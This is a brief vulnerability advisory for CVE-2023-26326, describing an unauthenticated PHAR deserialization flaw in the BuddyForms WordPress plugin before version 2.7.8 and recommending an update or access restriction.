CVE-2023-26326

Name of the Vulnerable Software and Affected Versions BuddyForms WordPress plugin versions prior to 2.7.8

Description The issue is related to an unauthenticated insecure deserialization problem. An attacker could exploit this to call files using a PHAR wrapper, which deserializes data and calls arbitrary PHP Objects. This can be used for malicious actions if a POP chain is also present.

Recommendations For versions prior to 2.7.8, update to version 2.7.8 or later to resolve the issue. As a temporary workaround, consider restricting access to the plugin's deserialization functionality until a patch is applied.